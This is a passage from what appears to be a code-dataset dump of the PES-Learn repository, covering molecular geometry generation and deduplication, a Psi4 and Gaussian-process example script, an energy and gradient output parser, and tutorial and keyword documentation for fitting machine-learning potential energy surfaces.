np.sort(df.loc[:,mask].values, axis=1)\n\n # Remove duplicates\n # take opposite of duplicate boolean Series (which marks duplicates as True)\n mask = -df.duplicated(subset=self.bond_columns)\n self.unique_geometries = self.all_geometries.loc[mask] \n self.n_disps = len(self.unique_geometries.index)\n print(\"Redundancy removal took {} seconds\".format(round((timeit.default_timer() - start),2)))\n print(\"Removed {} redundant geometries from a set of {} geometries\".format(nrows_before-self.n_disps, nrows_before))\n\n def filter_configurations(self):\n \"\"\"\n Filters the configuration space by computing the norms between geometries.\n Accepts the first point, then the point furthest from that point.\n Each subsequently added point is the one which has the longest distance \n into the set of currently accepted points \n \"\"\"\n start = timeit.default_timer()\n npoints = self.input_obj.keywords['grid_reduction']\n if npoints > self.unique_geometries.shape[0]:\n raise Exception(\"grid_reduction number of points is greater than the number of points in dataset\")\n print(\"Reducing size of configuration space from {} datapoints to {} datapoints\".format(self.n_disps, npoints))\n df = self.unique_geometries.copy()\n df = df[self.bond_columns]\n df['E'] = \"\" \n # pandas saved as objects, convert to floats so numpy doesnt reject it\n df = df.apply(pd.to_numeric)\n #sampler = DataSampler(df, npoints, accept_first_n=None)\n sampler = DataSampler(df, npoints, accept_first_n=None)\n sampler.structure_based()\n accepted_indices, rejected_indices = sampler.get_indices()\n self.unique_geometries = self.unique_geometries.iloc[accepted_indices] \n print(\"Configuration space reduction complete in {} seconds\".format(round((timeit.default_timer() - start),2)))\n\n def add_redundancies_back(self):\n \"\"\"\n #TODO currently does not account for simulataneous permutations\n Takes self.unique_geometries (which contains [bond_columns], cartesians, internals)\n and adds a last column, called duplicates, which contains internal coordinate dictionaries of duplicate geometries\n \"\"\"\n # WARNING since you do not drop straightforward dupes from self.all_geometries, there may be multiple 'new's in tmp_geoms\n # this is a fix, is it problematic?\n self.all_geometries = self.all_geometries.drop_duplicates(subset=self.bond_columns)\n # add column of duplicates, each row has its own empty list\n self.unique_geometries['duplicate_internals'] = np.empty((len(self.unique_geometries), 0)).tolist()\n self.unique_geometries['duplicate_interatomics'] = np.empty((len(self.unique_geometries), 0)).tolist()\n # current column structure of self.unique_geometries:\n # [interatomics], cartesians, internals, duplicate_internals, duplicate_interatomics\n\n # grab interatomic distance equivalent permutation operations\n bond_indice_permutations = ph.permute_bond_indices(self.mol.atom_count_vector)\n bond_permutation_vectors = ph.induced_permutations(self.mol.atom_count_vector, bond_indice_permutations) \n # list of lists of bond interatomics from self.all_geometries\n tmp_geoms = self.all_geometries[self.bond_columns].values.tolist() \n # for every permutation on every unique geometry, apply the permutation and see if it exists in the original dataset\n # if it does, add the internal and interatomic distance coordinates of duplicate from original geom dataset to duplicates column in self.unique_geometries\n for perm in bond_permutation_vectors:\n permuted_rows = []\n for row in self.unique_geometries.itertuples(index=False):\n # apply permutation to interatomic distances (index 0 --> -3, check if it changed, if it did, check if it is in original geom dataset \n # if it is in original dataset, and not already in the duplicates column of self.unique_geometries, add it \n new = [row[0:-4][i] for i in perm] \n if new != list(row[0:-4]):\n if new in tmp_geoms:\n intcoord = self.all_geometries.iloc[tmp_geoms.index(new)]['internals'] #grab internal coords\n # add duplicate to duplicate_internals column if it has not been found\n if intcoord not in row[-2]:\n row[-2].append(intcoord)\n # save as OrderedDict since internal coordinates are also OrderedDict\n idm = OrderedDict(self.all_geometries.iloc[tmp_geoms.index(new)][self.bond_columns]) #grab interatomic distance coords\n # add duplicate to duplicate_interatomics column if it has not been found\n if idm not in row[-1]:\n row[-1].append(idm) \n\n\n def generate_PES(self, template_obj):\n # generate the full geometry set or the removed redundancy geometry set?\n self.generate_geometries()\n if self.input_obj.keywords['remove_redundancy'].lower().strip() == 'true':\n print(\"Removing symmetry-redundant geometries...\", end=' ')\n self.remove_redundancies()\n\n if self.input_obj.keywords['grid_reduction']:\n self.filter_configurations()\n if self.input_obj.keywords['remember_redundancy'].lower().strip() == 'true':\n self.add_redundancies_back()\n df = self.unique_geometries \n elif self.input_obj.keywords['remove_redundancy'].lower().strip() == 'false':\n df = self.all_geometries\n \n pes_dir_name = self.input_obj.keywords['pes_dir_name']\n if not os.path.exists(\"./\" + pes_dir_name):\n os.mkdir(\"./\" + pes_dir_name)\n os.chdir(\"./\" + pes_dir_name)\n\n for i, cart_array in enumerate(df['cartesians'], start=1):\n # build xyz input file and put in directory\n xyz = ''\n xyz += template_obj.header_xyz()\n for j in range(len(self.mol.std_order_atoms)):\n xyz += \"%s %10.10f %10.10f %10.10f\\n\" % (self.mol.std_order_atom_labels[j], cart_array[j][0], cart_array[j][1], cart_array[j][2])\n xyz += template_obj.footer_xyz()\n if not os.path.exists(str(i)):\n os.mkdir(str(i))\n\n # tag with internal coordinates, include duplicates if requested\n with open(\"{}/geom\".format(str(i)), 'w') as f:\n tmp_dict = OrderedDict(zip(self.mol.geom_parameters, list(df.iloc[i-1]['internals'])))\n f.write(json.dumps([tmp_dict]))\n #f.write(json.dumps([df.iloc[i-1]['internals']])) \n if 'duplicate_internals' in df:\n for j in range(len(df.iloc[i-1]['duplicate_internals'])):\n f.write(\"\\n\")\n tmp_dict = OrderedDict(zip(self.mol.geom_parameters, df.iloc[i-1]['duplicate_internals'][j]))\n f.write(json.dumps([tmp_dict]))\n #f.write(json.dumps([df.iloc[i-1]['duplicate_internals'][j]])) \n # tag with interatomic distance coordinates, include duplicates if requested\n with open(\"{}/interatomics\".format(str(i)), 'w') as f:\n f.write(json.dumps([OrderedDict(df.iloc[i-1][self.bond_columns])]))\n if 'duplicate_interatomics' in df:\n for j in range(len(df.iloc[i-1]['duplicate_interatomics'])):\n f.write(\"\\n\") \n f.write(json.dumps([df.iloc[i-1]['duplicate_interatomics'][j]])) \n # write input file for electronic structure theory package \n with open(\"{}/{}\".format(str(i), self.input_obj.keywords['input_name']), 'w') as f:\n f.write(xyz)\n\n os.chdir(\"../\")\n print(\"Your PES inputs are now generated. Run the jobs in the {} directory and then parse.\".format(pes_dir_name))\n \n\n def old_remove_redundancies(self):\n \"\"\"\n Deprecated. Currently a bug: does not consider combined permutation operations,\n just one at a time. \n Theoretically rigorous, but slow.\n Handles the removal of redundant geometries arising from \n angular scans and like-atom position permutations\n \"\"\"\n start = timeit.default_timer()\n nrows_before = len(self.all_geometries.index)\n # first remove straightforward duplicates using interatomic distances\n # (e.g., angular, dihedral equivalencies)\n self.all_geometries[self.bond_columns] = self.all_geometries[self.bond_columns].round(decimals=10)\n self.unique_geometries = self.all_geometries.drop_duplicates(subset=self.bond_columns)\n print(\"Removed {} angular-redundant geometries. Now removing permutation-redundant geometries.\".format(len(self.all_geometries) - len(self.unique_geometries)))\n # remove like-atom permutation duplicates\n bond_indice_permutations = ph.permute_bond_indices(self.mol.atom_count_vector)\n bond_permutation_vectors = ph.induced_permutations(self.mol.atom_count_vector, bond_indice_permutations) \n print(\"Interatomic distances equivalent permutations: \", bond_permutation_vectors)\n for perm in bond_permutation_vectors:\n new_df = []\n permuted_rows = []\n for row in self.unique_geometries.itertuples(index=False):\n # apply induced bond permutation derived from like-atom permutations\n # the first n rows are the interatomic distances which we want to permute, the last two rows are the cartesian and internal coordinates\n new = [row[0:-2][i] for i in perm] \n # add new geometry to checklist\n permuted_rows.append(new)\n # if its unaffected by the permutation, we want to keep one copy\n if new == list(row[0:-2]):\n new_df.append(row)\n # uniqueness check\n if list(row[0:-2]) not in permuted_rows:\n new_df.append(row)\n # update dataframe with removed rows for this particular permutation vector\n self.unique_geometries = pd.DataFrame(new_df)\n nrows_after = len(self.unique_geometries.index)\n print(\"Redundancy removal complete {} seconds\".format(round((timeit.default_timer() - start),2)))\n print(\"Removed {} redundant geometries from a set of {} geometries\".format(nrows_before-nrows_after, nrows_before))\n\n\n def old_generate_geometries(self):\n \"\"\"\n Deprecated. Generates geometries in serial, converting Z-Matrices to cartesians to interatomics one at a time.\n Current implementation converts these to array operations, converting all geometries coordinates simultaneously.\n \"\"\"\n start = timeit.default_timer()\n intcos = self.generate_displacements() \n self.disps = []\n for gridpoint in intcos:\n tmp = OrderedDict([(self.mol.unique_geom_parameters[i], gridpoint[i]) for i in range(intcos.shape[1])])\n self.disps.append(tmp)\n # grab cartesians, internals, interatomics representations of geometry\n cartesians = []\n internals = []\n interatomics = []\n failed = 0 # keep track of failed 3 co-linear atom configurations\n # this loop of geometry transformations/saving is pretty slow, but scales linearly at least\n for i, disp in enumerate(self.disps):\n self.mol.update_intcoords(disp)\n try:\n cart = self.mol.zmat2xyz()\n except:\n failed += 1\n continue\n cartesians.append(cart)\n internals.append(disp)\n idm = gth.get_interatom_distances(cart)\n # remove float noise for duplicate detection\n idm = np.round(idm[np.tril_indices(len(idm),-1)],10)\n interatomics.append(idm)\n # preallocate dataframe space \n if failed > 0:\n print(\"Warning: {} configurations had invalid Z-Matrices with 3 co-linear atoms, tossing them out! Use a dummy atom to prevent.\".format(failed))\n df = pd.DataFrame(index=np.arange(0, len(self.disps)-failed), columns=self.bond_columns)\n df[self.bond_columns] = interatomics\n df['cartesians'] = cartesians\n df['internals'] = internals \n self.all_geometries = df\n print(\"Geometry grid generated in {} seconds\".format(round((timeit.default_timer() - start),2)))\n" }, { "alpha_fraction": 0.5295508503913879, "alphanum_fraction": 0.5594956874847412, "avg_line_length": 28.511627197265625, "blob_id": "6250e5017e59ca1fbeca95dc81835bfb1407ffd9", "content_id": "d358830f3ef0732fba18880deaa7ef20cd3ee567", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1269, "license_type": "permissive", "max_line_length": 78, "num_lines": 43, "path": "/Examples/1_water_api_example/gaussian_process/build.py", "repo_name": "zero0911/PES-Learn", "src_encoding": "UTF-8", "text": "import peslearn\n\ninput_string = (\"\"\"\n O \n H 1 r1\n H 1 r2 2 a2 \n \n r1 = [0.85,1.20, 5]\n r2 = [0.85,1.20, 5]\n a2 = [90.0,120.0, 5]\n\n energy = 'regex'\n use_pips = true\n energy_regex = 'Total Energy\\s+=\\s+(-\\d+\\.\\d+)'\n hp_maxit = 15\n training_points = 50\n sampling = structure_based\n \"\"\")\n\ninput_obj = peslearn.InputProcessor(input_string)\ntemplate_obj = peslearn.datagen.Template(\"./template.dat\")\nmol = peslearn.datagen.Molecule(input_obj.zmat_string)\nconfig = peslearn.datagen.ConfigurationSpace(mol, input_obj)\nconfig.generate_PES(template_obj)\n\n# run single point energies with Psi4\nimport os\nos.chdir(\"PES_data\")\ndirs = [i for i in os.listdir(\".\") if os.path.isdir(i) ]\nfor d in dirs:\n os.chdir(d)\n if \"output.dat\" not in os.listdir('.'):\n print(d, end=', ')\n os.system(\"psi4 input.dat\")\n os.chdir(\"../\")\nos.chdir(\"../\")\n\nprint('\\nParsing ab initio data...')\npeslearn.utils.parsing_helper.parse(input_obj, mol)\n\nprint('\\nBeginning GP optimization...')\ngp = peslearn.ml.gaussian_process.GaussianProcess(\"PES.dat\", input_obj, 'A2B')\ngp.optimize_model()\n" }, { "alpha_fraction": 0.40185657143592834, "alphanum_fraction": 0.6894744634628296, "avg_line_length": 39.725608825683594, "blob_id": "18f116e83d72a3b8253b171f6cef60c292f39b60", "content_id": "ca56c510a19220597c51df5e63dd24b2faa386b5", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 6679, "license_type": "permissive", "max_line_length": 567, "num_lines": 164, "path": "/1_Tutorials/2_loading_external_datasets/external_dataset_tutorial.md", "repo_name": "zero0911/PES-Learn", "src_encoding": "UTF-8", "text": "# Training models with datasets not created by PES-Learn \n\nPES-Learn supports building ML models from user-supplied datasets in many flexible formats. This tutorial covers all of the different kinds of datasets which can be loaded in and used.\n\n# 1. Supported Dataset Types \n# 1.1 Cartesian Coordinates\n**Note:** When PES-Learn imports Cartesian coordinate files, it re-orders the atoms to its standard ordering scheme. This was found to be necessary in order to enable the use of permutation invariant polynomials with externally supplied datasets. PES-Learn's standard atom order sorts elements by most common occurance, with an alphabetical tiebraker. For example, if the Cartesian coordinates of acetate C<sub>2</sub>H<sub>3</sub>O<sub>2</sub> were given in the order C,C,H,H,H,O,O, they would be automatically re-ordered to H<sub>3</sub>C<sub>2</sub>O<sub>2</sub>. \n\n**The software uses the set of interatomic distances for the geometries**, which are defined to be the row-wise order of the interatomic distance matrix in standard order:\n```\n H H H C C O O\nH \nH r0\nH r1 r2\nC r3 r4 r5\nC r6 r7 r8 r9\nO r10 r11 r12 r13 r14\nO r15 r16 r17 r18 r19 r20\n```\nThus, in all the following water examples, the HOH atom order is internally reordered to HHO.\n\nThe \"standard\" way to express geometry, energy pairs with Cartesian coordinates is the following:\n\n```\n3\n-76.02075832627291\nH 0.000000000000 -0.671751442127 0.596572464600\nO -0.000000000000 0.000000000000 -0.075178977527\nH -0.000000000000 0.671751442127 0.596572464600\n\n3\n-76.0264333762269331\nH 0.000000000000 -0.727742220982 0.542307610016\nO -0.000000000000 0.000000000000 -0.068340619196\nH -0.000000000000 0.727742220982 0.542307610016\n\n3\n-76.0261926533675592\nH 0.000000000000 -0.778194442078 0.483915467021\nO -0.000000000000 0.000000000000 -0.060982147482\nH -0.000000000000 0.778194442078 0.483915467021\n```\n\n\n\nHere, there is a number indicating the number of atoms, an energy on its own line in Hartrees, and Cartesian coordinates in Angstroms. \n## Flexibility of Cartesian Coordinate Input:\n* The **atom number** is **not needed**\n\n```\n-76.02075832627291\nH 0.000000000000 -0.671751442127 0.596572464600\nO -0.000000000000 0.000000000000 -0.075178977527\nH -0.000000000000 0.671751442127 0.596572464600\n\n-76.0264333762269331\nH 0.000000000000 -0.727742220982 0.542307610016\nO -0.000000000000 0.000000000000 -0.068340619196\nH -0.000000000000 0.727742220982 0.542307610016\n\n-76.0261926533675592\nH 0.000000000000 -0.778194442078 0.483915467021\nO -0.000000000000 0.000000000000 -0.060982147482\nH -0.000000000000 0.778194442078 0.483915467021\n```\n\n* **Blank lines** between each datablock are **not needed**\n\n```\n-76.02075832627291\nH 0.000000000000 -0.671751442127 0.596572464600\nO -0.000000000000 0.000000000000 -0.075178977527\nH -0.000000000000 0.671751442127 0.596572464600\n-76.0264333762269331\nH 0.000000000000 -0.727742220982 0.542307610016\nO -0.000000000000 0.000000000000 -0.068340619196\nH -0.000000000000 0.727742220982 0.542307610016\n-76.0261926533675592\nH 0.000000000000 -0.778194442078 0.483915467021\nO -0.000000000000 0.000000000000 -0.060982147482\nH -0.000000000000 0.778194442078 0.483915467021\n```\n* Your **whitespace delimiters do not matter at all**, and can be completely erratic, if you're into that:\n\n```\n-76.02075832627291\nH 0.000000000000 -0.671751442127 0.596572464600\nO -0.000000000000 0.000000000000 -0.075178977527\nH -0.000000000000 0.671751442127 0.596572464600\n-76.0264333762269331\nH 0.000000000000 -0.727742220982 0.542307610016\nO -0.000000000000 0.000000000000 -0.068340619196\nH -0.000000000000 0.727742220982 0.542307610016\n-76.0261926533675592\nH 0.000000000000 -0.778194442078 0.483915467021\nO -0.000000000000 0.000000000000 -0.060982147482\nH -0.000000000000 0.778194442078 0.483915467021\n```\n\n* You can **use Bohr instead of Angstroms** (just remember the model is trained in terms of Bohr when using it in the future!), and you can use whatever energy unit you want (though, keep in mind PES-Learn assumes it is Hartrees when converting units to wavenumbers (cm<sup>-1</sup>)\n\n# 1.2 Arbitrary internal coordinates\n**Note**: The keyword option `use_pips` should be set to `false` when using your own internal coordinates, unless the coordinates correspond to the standard order PES-Learn uses for interatomic distances, described above.\n\nFor internal coordinates, the first line requires a series of geometry parameter labels, with the last column being the energies labeled with `E`. One can use internal coordinates with comma or whitespace delimiters. A few examples:\n```\na1,r1,r2,E\n104.5,0.95,0.95,-76.026433\n123.0,0.95,0.95,-76.026193\n 95.0,0.95,0.95,-76.021038\n```\n\n```\na1 r1 r2 E\n104.5 0.95 0.95 -76.026433\n123.0 0.95 0.95 -76.026193\n95.0 0.95 0.95 -76.021038\n```\n```\nr0 r1 r2 E\n1.4554844420 0.9500000000 0.9500000000 -76.0264333762\n1.5563888842 0.9500000000 0.9500000000 -76.0261926534\n1.6454482672 0.9500000000 0.9500000000 -76.0210378425\n```\n\n# 2. Creating ML models with the datasets\n\nUsing an external dataset called `dataset_name` is the same whether it is a Cartesian coordinate or internal coordinate file. \nWith the Python API:\n```python\nimport peslearn\n\ninput_string = (\"\"\"\n use_pips = false\n hp_maxit = 15\n training_points = 500\n sampling = structure_based\n \"\"\")\n\ngp = peslearn.ml.GaussianProcess(\"dataset_name\", input_obj)\ngp.optimize_model()\n```\n\nusing a Neural Network:\n```python\nnn = peslearn.ml.NeuralNetwork(\"dataset_name\", input_obj)\nnn.optimize_model()\n```\n\nUsing the command line interface an input file could be:\n```python\nuse_pips = false\nhp_maxit = 15\ntraining_points = 1000\nsampling = smart_random\nml_model = gp\npes_name = 'dataset_name'\n```\n\nUsing the Python API, one can even partition and supply their own training, validation, and testing datasets:\n```python\nnn = peslearn.ml.NeuralNetwork('full_dataset_name', input_obj, train_path='my_training_set', valid_path='my_validation_set', test_path='my_test_set')\nnn.optimize_model()\n```\n" }, { "alpha_fraction": 0.8026315569877625, "alphanum_fraction": 0.8026315569877625, "avg_line_length": 29.399999618530273, "blob_id": "df35f1a70bb9dc247c240d6673172941df69aa01", "content_id": "4237f019fd8429740c7e121c66107a6afd65e956", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 152, "license_type": "permissive", "max_line_length": 39, "num_lines": 5, "path": "/peslearn/utils/__init__.py", "repo_name": "zero0911/PES-Learn", "src_encoding": "UTF-8", "text": "from . import regex\nfrom . import permutation_helper\nfrom . import parsing_helper\nfrom . import geometry_transform_helper\nfrom . import printing_helper\n" }, { "alpha_fraction": 0.5755395889282227, "alphanum_fraction": 0.5948147177696228, "avg_line_length": 41.31609344482422, "blob_id": "ad955f3f6d84d5e54ebca44803e4decec0916d88", "content_id": "8de513b0ef576ee6939444e4ffb75393fd2b1899", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7367, "license_type": "permissive", "max_line_length": 134, "num_lines": 174, "path": "/peslearn/datagen/outputfile.py", "repo_name": "zero0911/PES-Learn", "src_encoding": "UTF-8", "text": "\"\"\"\nContains the OutputFile class for extracting information from output files produced by electronic structure theory codes\n\"\"\"\n\nfrom ..utils import regex\nfrom .. import constants\n\nimport re\nimport numpy as np\nimport cclib.io.ccio as ccio\n\nclass OutputFile(object):\n \"\"\"\n A class for extracting information from output (log) files produced by electronic structure theory codes \n Parameters\n ----------\n output_path : str\n A string represnting a file path to an output (log) file \n \"\"\"\n def __init__(self, output_path):\n self.output_path = output_path\n # save the output as a string \n with open(output_path, \"r\") as f: \n self.output_str = f.read()\n\n def extract_energy_with_regex(self, energy_regex):\n \"\"\"\n Finds the energy value (a float) in an output file according to a user supplied\n regular expression identifier.\n \n Example:\n Suppose your output file contains:\n \n FINAL ELECTRONIC ENERGY (Eh): -2.3564983498\n\n One can obtain this floating point number with the regex identifier:\n \\s*FINAL ELECTRONIC ENERGY \\(Eh\\):\\s+(-\\d+\\.\\d+)\n\n Checking ones regular expression is easy with online utilities such as pythex (see pythex.org)\n\n Parameters\n ---------\n energy_regex : str\n A string containing the regex code for capturing an energy floating point number.\n e.g. \"\\s*FINAL ELECTRONIC ENERGY \\(Eh\\):\\s+(-\\d+\\.\\d+)\"\n\n Returns\n -------\n last_energy : float\n The last energy value matching the regular expression identifier \n \"\"\"\n last_energy = 0.0\n tmp = re.findall(energy_regex, self.output_str)\n if tmp:\n last_energy = float(tmp[-1])\n return last_energy\n # how do we handle cases when output files do not produce the energy?\n # we do not want to kill the program, but we also want to communicate that something went wrong during that computation \n else:\n return None \n\n def extract_energy_with_cclib(self, cclib_attribute, energy_index=-1):\n \"\"\"\n Attempts to extract energies with cclib \n Parameters\n ---------\n cclib_attribute : str\n The cclib target attribute. Valid options can be found in cclib documentation.\n Examples include \"ccenergies\", \"scfenergies\", or \"mpenergies\"\n energy_index : int\n Which energy to grab from the output file which matches the cclib_attribute. \n Default is -1, the last energy printed in the output file which matches the cclib_attribute. \n \"\"\"\n try:\n cclib_outputobj = ccio.ccread(self.output_path) \n except:\n e = None \n return e\n e = None \n # for whatever reason, sometimes each energy is a single element list, so we have to code around that \n # also, cclib does not handle things well if something fails to parse, needtry/except pairs \n if cclib_attribute == \"scfenergies\":\n try:\n e = cclib_outputobj.scfenergies[-1] \n if isinstance(e, list):\n e = e[0]\n except:\n e = None \n if cclib_attribute == \"mpenergies\":\n try:\n e = cclib_outputobj.mpenergies[-1] \n if isinstance(e, list):\n e = e[0]\n except:\n e = None \n if cclib_attribute == \"ccenergies\":\n try:\n e = cclib_outputobj.ccenergies[-1] \n if isinstance(e, list):\n e = e[0]\n except:\n e = None \n # cclib puts energies into eV... ugh \n if e: \n e /= constants.hartree2ev\n return e \n \n def extract_cartesian_gradient_with_regex(self, header, footer, grad_line_regex):\n \"\"\"\n Extracts cartesian gradients according to user supplied regular expressions.\n A bit more tedious to use than the energy regex extractor as the size of the regular expressions may be quite long.\n Requires that the electronic structure theory code prints the cartesian gradient in a logical way.\n A \"header\" and \"footer\" identifier is needed so we don't accidentally parse things that *look like* gradients, like geometries\n\n Example: \n CARTESIAN GRADIENT: (header)\n (optional extra text\n that does not match grad_line_regex)\n Atom 1 O 0.00000 0.23410 0.32398 (grad_line_regex)\n Atom 2 H 0.02101 0.09233 0.01342 \n Atom 3 N 0.01531 0.04813 0.06118\n (optional extra text that does not match grad_line_regex)\n (footer)\n \n Parameters\n ----------\n header : str\n A string of regular expressions which match unique text that is before and close to the gradient data\n footer : str\n A string of regular expressions for text that comes close to after the gradient data (does not need to be unique)\n grad_line_regex : str\n A regex identifier for one line of gradient data. The regex must work for ALL lines of the gradient, so be sure\n to make it general enough. Must use capture groups () for the x, y, and z components\n For example, if the output file gradient is \n Atom 1 Cl 0.00000 0.23410 0.32398 \n Atom 2 H 0.02101 0.09233 0.01342 \n Atom 3 N 0.01531 0.04813 0.06118\n A valid argument for grad_line_regex would be \"Atom\\s+\\d+\\s+[A-Z,a-z]+\\s+(-?\\d+\\.\\d+)\\s+(-?\\d+\\.\\d+)\\s+(-?\\d+\\.\\d+)\"\n This can easily be tested with online utilities such as pythex (see pythex.org)\n Returns\n -------\n gradient : np.array\n A numpy array of floats representing the cartesian gradient\n \"\"\"\n # warning: cartesian reorientation by quantum chemistry software may mess this up\n # grab all text after the header\n trimmed_str = re.split(header, self.output_str)[-1]\n # isolate gradient data using footer\n trimmed_str = re.split(footer, trimmed_str)[0] \n # look for gradient line regex \n gradient = re.findall(grad_line_regex, trimmed_str)\n #TODO add catch for when only some lines of the gradient are parsed but not all, check against number of atoms or something\n if gradient:\n # this gradient is a list of tuples, each tuple is an x, y, z for one atom\n gradient = np.asarray(gradient).astype(np.float)\n return gradient \n else:\n return None\n\n def extract_cartesian_gradient_with_cclib(self, grad_index=-1):\n \"\"\"\n Attempts to extract the cartesian gradient with cclib \n Parameters\n ---------\n grad_index : int\n Which gradient to grab from the output file. \n Default is -1, the last gradient printed in the output file which matches the cclib_attribute. \n \"\"\"\n # warning: cartesian reorientation by quantum chemistry software may mess this up\n cclib_outputobj = ccio.ccread(self.output_path) \n if hasattr(cclib_outputobj, 'grads'):\n return cclib_outputobj.grads[-1]\n else:\n return None\n\n\n\n\n" }, { "alpha_fraction": 0.6796206831932068, "alphanum_fraction": 0.6854963302612305, "avg_line_length": 44.11627960205078, "blob_id": "f45d7f239f18ed4eedf670e7c8ba03e28fe5cc8b", "content_id": "759c443cadb7ca3bd3e18ff26ffc762c574311eb", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 9701, "license_type": "permissive", "max_line_length": 532, "num_lines": 215, "path": "/3_Keywords/keywords.md", "repo_name": "zero0911/PES-Learn", "src_encoding": "UTF-8", "text": "# PES-Learn Keyword Options \n\n### How to assign PES-Learn keywords...\n* Using command line interface:\n * In your PES-Learn input file, `input.dat`, all keywords are assigned the same way: \n \n ```\n keyword1 = option1\n keyword2 = option2\n ```\n \n\n* Using Python API:\n * In your Python code, after importing PES-Learn, you may freely dump keywords into a multi-line string and assign them just as you would when using the command line interface, and then create an InputProcessor object, which holds all of the keyword options and is passed to most other objects in PES-Learn:\n \n```python\nimport peslearn\n \ninput_string = \"\"\"\n keyword1 = option1\n keyword2 = option2\n \"\"\"\ninput_obj = peslearn.InputProcessor(input_string)\n```\n * Once an `InputProcessor` object is created, new keywords can be set with the `set_keyword` method:\n \n ```python\n inp_obj = peslearn.InputProcessor(\"\")\n inp_obj.set_keyword({'keyword':'option'})\n ```\n \n \n**Note:** Some keywords must be surrounded in single `'` or double `\"` quotes. These keywords all assign either regular expressions or user-specified names of files/directories for the software to use, such as the name of the dataset, the name of written electronic structure theory code input files, name of electronic structure theory code output files, etc. Rule of thumb: if its a name assignment or regex, use quotes.\n\n**Note:** PES-Learn just looks for the keywords in your input, case-insensitive. If you spell something wrong, it will just be ignored. If you want to comment something out, use the pound sign `#` before the text you want removed.\n\nWhen using command line interface `python path/to/peslearn/driver.py`, to specify which mode to run the software in, use:\n* `mode = generate`, `mode = parse`, or `mode = learn`, or the corresponding shorthand `mode = g` `mode = p`, `mode = l` \nIf this keyword is not used, the software will ask what you want to do.\n\n## Data Generation Keywords\n\n* `input_name` \n **Description:** The name of generated input files for electronic structure theory packages. \n * **Type**: string, surrounded by quotes\n * **Default**: 'input.dat'\n * **Possible values**: any string\n\n\n* `output_name` \n **Description:** The name of electronic structure theory package output (log) files which PES-Learn will attempt to parse.\n * **Type**: string, surrounded by quotes\n * **Default**: 'output.dat'\n * **Possible values**: any string \n\n\n* `energy` \n **Description:** Energy parsing method, regular expressions or cclib.\n * **Type**: string\n * **Default**: None\n * **Possible values**: regex, cclib \n\n\n* `energy_regex` \n **Description:** Regular expression pattern which captures electronic energy from an electronic structure theory code output file. Always takes the last occuring match in the output file. Floating point numbers `(?-\\d+\\.\\d+)` should be surrounded by parentheses to capture just the number. It is recommended to check your regular expressions with [Pythex](https://pythex.org/). Simply copy the part of the output file you are trying to capture as well as your trial regular expression to see if it properly captures the energy. \n * **Type**: string, surrounded by quotes\n * **Default**: None\n * **Possible values**: Any regular expression string.\n\n\n* `energy_cclib` \n **Description:** Use cclib to parse energies from output files. Takes the last occurance captured by cclib. \n * **Type**: string\n * **Default**: None\n * **Possible values**: scfenergies, mpenergies, ccenergies\n\n \n* `pes_dir_name` \n **Description:** The name of the directory containing all electronic structure theory package input and/or output files. Used both when generating and parsing data.\n * **Type**: string, surrounded by quotes\n * **Default**: 'PES_data'\n * **Possible values**: any string \n\n\n* `pes_format` \n **Description:** When parsing output file data, should PES-Learn create a dataset in terms of interatomic distances or user-supplied internal coordinates given by the Z-Matrix? \n * **Type**: string\n * **Default**: interatomics\n * **Possible values**: interatomics, zmat \n\n\n* `pes_name` \n **Description:** The name of the produced dataset after parsing output files from `pes_dir_name`, as well as the name of the dataset which will be read for building ML models.\n * **Type**: string, surrounded by quotes\n * **Default**: 'PES.dat'\n * **Possible values**: any string \n\n\n* `remove_redundancy` \n **Description:** Removes symmetry-redundant geometries from internal coordinate grid \n * **Type**: bool\n * **Default**: true\n * **Possible values**: true, false\n \n \n* `remember_redundancy` \n **Description:** Remember symmetry-redundant geometries when they are removed using `remove_redundancy`. This is done so that redundant geometries can be included in the dataset created when parsing, and assigned the appropriate energy of its redundant partner whos energy was actually computed. These geometries are included when parsing only if `pes_redundancy` is set to true.\n * **Type**: bool\n * **Default**: false\n * **Possible values**: true, false\n\n\n* `pes_redundancy` \n **Description:** Include all redundant geometries and assign appropriate redundant energies when creating a dataset with parsing capability. Doesn't do anything unless `remember_redundancy` was set to true when data was generated.\n * **Type**: bool\n * **Default**: false\n * **Possible values**: true, false \n\n\n* `grid_reduction` \n **Description:** Reduce the size of the internal coordinate grid to _n_ points. Acts **after** redundancy removal. Analyzes Euclidean distances between all datapoints, and creates a sub-grid of *n* geometries which are maximally far apart from one another.\n * **Type**: int\n * **Default**: None\n * **Possible values**: any integer, less than the total number of points in the internal coordinate grid after redundancies are removed.\n \n \n* `eq_geom` \n **Description:** Forces this one geometry (typically equilibrium geometry) into the dataset. Internal coordinates are supplied in the order they appear in the Z-Matrix of the input file. \n * **Type**: list\n * **Default**: None\n * **Possible values**: `[1.0, 1.0, 104.5, 1.5, 120, 180]`, etc.\n \n\n* `sort_pes` \n **Description:** When parsing to produce a dataset, sort the energies in increasing order \n * **Type**: bool\n * **Default**: true\n * **Possible values**: true, false\n\n \n## Machine Learning Keywords\n\n* `ml_model` \n **Description:** Use Gaussian process regression or neural networks? \n * **Type**: string\n * **Default**: gp\n * **Possible values**: gp, nn\n \n\n* `use_pips` \n **Description:** Use software's library of fundamental invariant polynomials to represent the interatomic distances dataset in terms of permutation invariant polynomials. Requires that the dataset is an interatomic distance dataset produced by PES-Learn, or a properly formatted Cartesian coordinate external dataset. \n * **Type**: bool\n * **Default**: true\n * **Possible values**: any string\n\n\n* `sampling` \n **Description:** Training set sampling algorithm \n * **Type**: string\n * **Default**: structure_based\n * **Possible values**: structure_based, smart_random, random\n \n\n* `training_points` \n **Description:** Number of training points \n * **Type**: int\n * **Default**: 50\n * **Possible values**: any int smaller than total dataset size.\n \n* `validation_points` \n **Description:** Number of validation points. Currently only used for neural networks.\n * **Type**: int\n * **Default**: Random set of half the points remaining after setting aside training set.\n * **Possible values**: Any positive integer smaller than (total dataset size - `training_points`).\n \n\n* `hp_maxit` \n **Description:** Maximum number of hyperparameter tuning iterations. \n * **Type**: int\n * **Default**: 20\n * **Possible values**: Any positive integer\n\n\n* `rseed` \n **Description:** Global random seed. Used for initializing hyperparameter optimization iterations, random training set sampling.\n * **Type**: int\n * 